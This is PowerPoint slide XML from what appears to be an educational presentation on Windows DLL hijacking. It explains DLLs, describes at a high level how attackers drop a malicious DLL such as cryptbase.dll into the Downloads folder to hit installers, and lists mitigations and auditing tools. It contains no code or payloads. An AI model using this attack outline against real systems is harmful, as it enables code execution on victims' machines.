          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Default Folder, the downloads directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="988741" y="2628014"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Single bad file can open upon up many vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="988741" y="3059332"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Installers made </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>with NSIS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Nullsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Scriptable Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>System)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443452" y="3526282"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Saw how various installers were affected by a bad cryptbase.dll</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="4430756"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example webpage which will download a zip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="4856668"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Microsoft’s Edge browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="5294071"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Issues with using “Downloads” Folder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548958" y="1104157"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attackers Main goal is to put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>bad DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>into a certain folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130612304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arn(inVertic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arn(inVertic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arn(inVertical)">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arn(inVertical)">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arn(inVertical)">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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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19" grpId="0"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="24"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342055"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Mitigation and Fixes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754232" y="926830"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Initially:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295408" y="1290369"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Microsoft solution was a registry fix, system wide or app-basis.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295408" y="1611680"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Modified the DLL search path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1933000" y="1932991"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Prevent DLL loading from CWD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1933000" y="2296530"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Prevent DLL loading from network drives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295408" y="2806604"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>System wide fix could break legitimate applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295408" y="3143634"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Lot of the responsibility fell on developers to write safe code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399669" y="3870770"/>
            <a:ext cx="9718448" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>As a user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="943955" y="4332435"/>
            <a:ext cx="9718448" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>TCPView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>			- DLL Hijack Auditor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Procmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>			- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (only for Enterprise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Procexp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295408" y="3539862"/>
            <a:ext cx="9718448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hijacking still possible in Windows 10 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2015-6132)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178494437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arn(inVertical)">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barn(inVertical)">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barn(inVertical)">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barn(inVertical)">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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="5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2" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="14" grpId="0"/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="33"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4951" y="419922"/>
            <a:ext cx="3200400" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>What are DLLs?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" i="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224951" y="1147313"/>
            <a:ext cx="5624423" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic-Link Libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Mechanism in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>to share code and data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2890987" y="2325095"/>
            <a:ext cx="2846717" cy="886113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent3">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u="sng" dirty="0" smtClean="0"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3457770" y="5640800"/>
            <a:ext cx="1713153" cy="731426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent3">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User</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Smiley Face 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3570723" y="5763943"/>
            <a:ext cx="379562" cy="396815"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFac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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270415" y="5041047"/>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089495" y="5041047"/>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239649" y="4026721"/>
            <a:ext cx="2056824" cy="830309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent4">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Windows Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118969" y="3352756"/>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513899" y="4027172"/>
            <a:ext cx="2056824" cy="830309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent4">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Windows Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3120261" y="3358533"/>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6605737" y="2289795"/>
            <a:ext cx="2846717" cy="886113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent3">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u="sng" dirty="0" smtClean="0"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6692136" y="3352756"/>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5915428" y="2768151"/>
            <a:ext cx="512584" cy="2212"/>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7852254" y="3765111"/>
            <a:ext cx="3200400" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0" smtClean="0"/>
              <a:t>Why use DLLs?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7852254" y="4258986"/>
            <a:ext cx="5624423" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easier to design and build an application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7852254" y="4535324"/>
            <a:ext cx="5624423" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows for better Memory management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136042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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="5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par>
                                <p:cTn id="21" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
